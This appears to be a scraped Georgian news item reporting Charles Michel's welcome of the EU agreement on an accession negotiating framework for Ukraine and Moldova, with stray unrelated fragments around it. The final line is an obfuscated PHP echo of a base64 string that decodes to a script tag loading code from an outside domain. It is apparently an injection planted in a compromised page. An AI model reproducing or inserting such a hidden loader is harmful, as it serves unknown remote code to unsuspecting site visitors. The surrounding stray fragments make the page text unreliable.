celsiusi
ავერსი შნაიდერი

 მივესალმები უკრაინისა და მოლდოვის გაწევრიანებისთვის პრინციპულ შეთანხმებას მოლაპარაკებების ჩარჩოსთან დაკავშირებით, – ამის შესახებ ევროპული საბჭოს პრეზიდენტი შარლ მიშელი სოციალურ ქსელში წერს.

როგორც შარლ მიშელი აღნიშნავს, ევროპის საბჭო მხარს დაუჭერს უკრაინას წევრობის გზაზე.

„ველოდები ორივესთან პირველ სამთავრობოთაშორის კონფერენციას. ჩვენ ვასრულებთ დაპირებებს და მხარს დაგიჭერთ წევრობის გზაზე“, – წერს შარლ მიშელი.

ევროკავშირის ელჩებმა უკრაინისა და მოლდოვის გაწევრიანებაზე მოლაპარაკებების ჩარჩო ფორმატი შეათანხმეს. მომდევნო ეტაპია – სამთავრობოთაშორისო კონფერენცია, რომელიც 25 ივნისს გაიმართება და რომელზეც ოფიციალურად დაიწყება გაწევრიანების შესახებ მოლაპარაკებები.

131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");